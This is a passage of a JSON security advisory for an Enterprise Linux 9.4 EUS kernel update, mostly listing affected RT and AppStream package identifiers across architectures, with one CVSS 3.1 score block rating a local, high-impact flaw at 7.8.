"RT-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
